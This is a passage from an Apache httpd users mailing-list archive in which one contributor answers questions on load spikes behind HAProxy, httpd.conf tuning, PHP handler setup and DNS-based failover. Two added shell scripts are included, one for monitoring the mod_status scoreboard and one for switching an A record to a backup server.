Please see my config below as  quick snapshot of the httpd.conf file 
on our Centos Servers.


The weird thing is when I would go see the server-status I would see 
all the slots filled with either W or C and nothing else... Then after 
what appears a random amount of time it would all clear up, and 
then come back again. Almost like HAProxy would send a bunch of 
requests to a server, then it would get full and then (haproxy) say, oh 
that server is filled I will not send traffic there, for now, then it 
would come back and see hey this server is empty, let's send a bunch 
of traffic there...




So it may just as well be the frontend that causes these spikes; you 
want to establish this with certainty.


Do all apache backend boxes spike at the same time ?

You really need to do a more thorough investigation.

Consider graphing the performance of all boxes, and comparing values 
during different times of the day.


An rrdtool grapher like cacti or mrtg will help with this, at marginal 
extra load.


If you consider that too heavy, munin has useful data to correlate CPU 
with disk I/O and apache stats.




We also use memcache to cache sessions and mysql queries, along with 
eAccelerator... I assume that those are functioning properly





That's a pretty large assumption. Don't.


Does this make sense, am I on drugs? :)



You tell us.






This tells us nothing. WHICH ONE are you actually using ?
If you're using prefork (which is the stupid choice for high load 
machines), starting up a hundred new threads at peak times will take 
MINUTES.


It looks as if you haven't tuned any of the really vital server 
variables for this supposed high load you're trying to handle.






Options FollowSymLinks

AllowOverride None





You really want to deny access here.




Options -Indexes FollowSymLinks



This does nothing.


AllowOverride All

Order allow,deny

Allow from all





UserDir disable



DirectoryIndex index.php index.html

AccessFileName .htaccess



Order allow,deny

Deny from all



TypesConfig /etc/mime.types

DefaultType text/plain



MIMEMagicFile conf/magic



HostnameLookups Off

ErrorLog logs/error_log

LogLevel notice

LogFormat "%h" combined

LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b" common

LogFormat "%{Referer}i -> %U" referer

LogFormat "%{User-agent}i" agent

CustomLog "/dev/null" combined



That's asinine.


GeoIPEnable On

GeoIPDBFile "/usr/local/share/GeoIP/GeoIPCity.dat"

GeoIPScanProxyHeaders On



Is this in any way a heavy/expensive database ?
What is being logged by this ?
What is it used for ?
Depending on usage, it may be as bad as performing DNS lookups.


--
J.
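
One way to capture the W/C pattern described in this thread on each backend, as an added example that is not from the original messages: it reduces `server-status?auto` output to counters that can be logged from cron on every web server and lined up against the load balancer's view. `STATUS_URL` and the sample scoreboard are assumptions; mod_status has to be enabled and should be reachable from trusted addresses only.

```shell
#!/bin/sh
# Constructed sample of `server-status?auto` output, not taken from the thread.
sample_status() {
    cat <<'EOF'
Total Accesses: 184230
BusyWorkers: 14
IdleWorkers: 2
Scoreboard: WWWWWWWWCCCCCW__....
EOF
}

# count_state CHAR SCOREBOARD -> number of slots currently in that state
count_state() {
    printf '%s' "$2" | tr -cd "$1" | wc -c | tr -d ' '
}

# summarise: reads ?auto output on stdin and prints one line of counters.
#   W = sending reply, C = closing connection, _ = idle worker,
#   . = open slot with no process (not counted as a worker)
summarise() {
    sb=$(sed -n 's/^Scoreboard: //p')
    w=$(count_state W "$sb")
    c=$(count_state C "$sb")
    idle=$(count_state _ "$sb")
    open=$(count_state . "$sb")
    workers=$(( ${#sb} - open ))
    if [ "$workers" -gt 0 ]; then
        pct=$(( (w + c) * 100 / workers ))
    else
        pct=0
    fi
    echo "W=$w C=$c idle=$idle open=$open workers=$workers wc_pct=$pct"
}

# is_saturated THRESHOLD: succeeds when W+C hold at least THRESHOLD percent
# of the running workers, the state described in the post.
is_saturated() {
    line=$(summarise)
    [ "${line##*wc_pct=}" -ge "$1" ]
}

# Poll one backend when STATUS_URL is set (hypothetical variable), so the
# timestamps can be compared across backends and with the HAProxy log.
if [ -n "${STATUS_URL:-}" ]; then
    printf '%s %s ' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$STATUS_URL"
    curl -fsS --max-time 5 "$STATUS_URL" | summarise
fi
```

If every backend crosses the threshold in the same minute, the cause is more likely shared (frontend, database, cache) than a single Apache box.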



Re: [users@httpd] .htaccess

2011-06-08 Thread Jeroen Geilman

On 06/08/2011 09:50 PM, dhottin...@harrisonburg.k12.va.us wrote:
I currently use .htaccess to prompt for username and password and 
point it to an ldap database running on my mailserver.  I'm considering 
moving all my mail accounts to gmail.  Does anyone know if it is 
possible to authenticate with .htaccess pointing to gmail for info?


thanks,

ddh




gmail will not expose authentication procedures to the outside world.

This would be quite silly.


--
J.





Re: [users@httpd] PHP Not Working

2011-06-09 Thread Jeroen Geilman

On 06/09/2011 11:48 PM, Xavier Lopez wrote:

Hi, I'm using Apache 2.2 on Ubuntu 10.04. I've checked that php mod is
enabled. It is. I'm using virtual hosts.  It serves all html files,
but not php. Following is my VHost configuration:


 ServerName http://new.dev
ServerAdmin webmaster@localhost
 DocumentRoot /home/zave/Public/new
 RewriteEngine off

 
 RewriteEngine on
 RewriteCond %{REQUEST_FILENAME} !-f
 RewriteCond %{REQUEST_FILENAME} !-d
 RewriteRule !\.(js|ico|gif|jpg|png|css)$ /index.php
 


Options FollowSymLinks
AllowOverride None



You are allowing apache full access to your OS root directory.
Don't do that.



Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all


ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all


ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog /var/log/apache2/access.log combined

 Alias /doc/ "/usr/share/doc/"
 
 Options Indexes MultiViews FollowSymLinks
 AllowOverride None
 Order deny,allow
 Deny from all
 Allow from 127.0.0.0/255.0.0.0 ::1/128
 


All my VHosts are configured the same way, save for the ServerName and
DocumentRoot directives. Please help.



I see nothing related to handling PHP.
You need to tell apache what to do with .php files.

This can be implemented - as documented - by adding


SetHandler application/x-httpd-php


in your Documentroot Directory block.


--
J.





Re: [users@httpd] PHP Not Working

2011-06-10 Thread Jeroen Geilman

On 06/10/2011 08:31 PM, zavelo...@gmail.com wrote:
J, I couldn't figure out what exactly you meant when you typed "in 
your Documentroot Directory". Did you mean in the block of text that 
contains the DocumentRoot Directive, or the Directory Directive 
containing the document root? I tried it both ways, like so:


ServerName http://new.dev
ServerAdmin webmaster@localhost
DocumentRoot /home/zave/Public/new
RewriteEngine off

SetHandler application/x-httpd-php


AND:


Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all

SetHandler application/x-httpd-php






Both are valid, but the former means you allow PHP processing anywhere, 
while the latter restricts it to your web content location.



After restarting Apache, neither made any difference. Am I doing it 
incorrectly?


You'd have to show concrete evidence of this.
Run httpd -L to verify the php module is loaded.
Clear the browser cache.


--
J.





Re: [users@httpd] How to run a backup server?

2011-06-10 Thread Jeroen Geilman

On 06/10/2011 09:05 PM, Wilson Hernandez wrote:

Thanks for replying.

I actually would like to have the main server locally and the backup 
server hosted somewhere else with: Amazon, Godaddy, etc...



The cheapest way is to point the hostname to your home IP, and set a 
very short TTL, say 5 minutes.

Use the minimum your DNS hoster will accept.

Then you can switch to your backup in that time frame by altering the A 
record.


This is trivially automated by running a cron script on the backup 
server that checks if your home IP is responding, and if not, switches 
the DNS record to itself.



--
J.
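
The cron script described above, as an added example that is not part of the original message. It assumes the DNS hoster accepts RFC 2136 dynamic updates through `nsupdate`; every name, address and path is a placeholder, and the consecutive-failure threshold and the automatic switch back to the home server go beyond what the post states.

```shell
#!/bin/sh
# Placeholders (assumptions): documentation addresses and example names.
PRIMARY_IP=192.0.2.10              # home server
BACKUP_IP=198.51.100.20            # this (backup) server
RECORD=www.example.org.            # A record to switch
TTL=300                            # the 5 minutes suggested in the post
THRESHOLD=3                        # failed probes in a row before switching
STATE=/var/tmp/failover.count      # consecutive-failure counter
KEYFILE=/etc/failover/tsig.key     # TSIG key that may update RECORD only

# probe IP: succeeds if the web server at IP answers within 5 seconds
probe() {
    curl -fsS -o /dev/null --max-time 5 -H "Host: ${RECORD%.}" "http://$1/"
}

# next_count PREVIOUS PROBE_STATUS -> new consecutive-failure count
next_count() {
    if [ "$2" -eq 0 ]; then echo 0; else echo $(( $1 + 1 )); fi
}

# target_ip COUNT -> the address the A record should hold
target_ip() {
    if [ "$1" -ge "$THRESHOLD" ]; then echo "$BACKUP_IP"; else echo "$PRIMARY_IP"; fi
}

# update_commands IP -> nsupdate input that replaces the A record
update_commands() {
    printf 'update delete %s A\nupdate add %s %s A %s\nsend\n' \
        "$RECORD" "$RECORD" "$TTL" "$1"
}

# One cron run: probe, update the counter, change DNS only when needed.
run_once() {
    prev=$(cat "$STATE" 2>/dev/null || echo 0)
    if probe "$PRIMARY_IP"; then rc=0; else rc=1; fi
    count=$(next_count "$prev" "$rc")
    echo "$count" > "$STATE"
    want=$(target_ip "$count")
    have=$(dig +short "$RECORD" A | head -n 1)
    if [ "$want" != "$have" ]; then
        update_commands "$want" | nsupdate -k "$KEYFILE"
    fi
}

if [ "${1:-}" = "run" ]; then
    run_once
fi
```

Scheduled every minute with the argument `run`, the record moves after three failed probes and moves back on the first successful one; keep the TSIG key readable only by the cron user.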

